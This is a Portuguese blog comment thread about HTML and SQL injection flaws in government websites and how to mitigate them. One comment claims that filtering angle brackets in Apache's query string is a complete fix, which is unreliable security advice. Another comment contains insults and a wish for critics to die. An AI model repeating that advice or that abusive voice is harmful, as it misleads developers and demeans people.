O mais inteligente mesmo é nunca usar nada que o usuário passe num GET ou POST sem tratamento. Se não for um HTML injection, vai ser um SQL injection, que é muito pior, causa danos muito maiores e é tão simples de evitar quanto.
Viriclus
Valeu, como nao sou da area de desenvolvimento, nao consigo tratar esses “erros”. Vou instalar e configurar o Mod_Security e o Suhosin pra ver se resolve ou mesmo contorana a situacao ate achar alguem pra “arrumar” isso.
Maneh
Configura o QUERY_STRING no Apache para tratar < > e pronto, independente da tecnologia isso funciona, é a solução melhor por que o servidor de aplicação nem vai ter que se dar o trabalho para processar isso, vai ficar na DMZ, e é bom que esses bundões param de falar merda e ainda criticar a solução. Falta de trabalho dá nisso! Olho o que os caras fazem com o tempo que estão ociosos! Em vez de melhor a bosta do debian!
Babacas
Esses caras são tão arrogantes e merdas que ainda criticam tratar fora da aplicação isso, é amadorismo, muleque mesmo! A Amanda ainda fica babando ovo dos babacas, quero ver se o dela estivesse na reta o que ia acontecer! Incompetencia do testador! A etica e profissionalismo significa para vc, amanda, a mesma coisa que uma bosta, algo que deve ser desprezado! Você diz amanda “divulgar a quem possa corrigi-los”, então divulguem para os responsaveis que possa corrigi-los, o problema é que eles informaram e acham que a solução vem da noite para o dia, isso é fruto de falta de etica e profissionalismo sim, a visão deles é limitada achando que é só ir la e fazer o tratamento na porra da variavel! São tudo uns filhos da puta, que deveriam morrer e queimar eternamente no inferno!
metal
Eu falei pra não usar o espaço de comentários para algo que não seja construtivo. Você esta no meu Blog, no meu espaço e estou deixando rolar sem moderar seus comentários. Mas você passou do limite. Apaguei seu último comentário.
Ninguém criticou a solução de tratar fora da aplicação. Na boa, vai trabalhar, que pra uma falha boba dessa você já gastou muito tempo aqui. (Por acaso você é da Squadra Tecnologia?!)
Djavan Fagundes
Metal,
Parabéns pela iniciativa! Além de avisar aos responsáveis onde há brechas em seus sites, informa aos desenvolvedores sobre ela (para que eles não cometam o erro de deixá-las passar).
Sobre testes, responsabilidade do testador, digo o seguinte:
Os sites governamentais são construídos por fábricas de software que “alocam” os profissionais, na maioria, dos casos pouco experientes para fazê-lo, com um prazo, em geral, bem apertado.
Não há tempo de realizar satisfatoriamente os testes funcionais para garantir que um botão tenha a funcionalidade que se propõe, testes unitários e de segurança, é realidade quase inexiste.
Aos trolls que comentaram acima, que estão claramente “com culpa no cartório”, ao invés de ficarem putinhos aqui, com ataques de pelancas, vão aos seus gerentes ou superiores, pedirem prazos melhores estimados e treinamentos e corram atrás para tornarem-se profissionais melhores.
erikcineasta
segurança nacional se estabelece com inteligência…
(agradecimento especial a Ricardo Ruiz)
http://culturadigital.br/members/eriksandroalvesdeoliveira/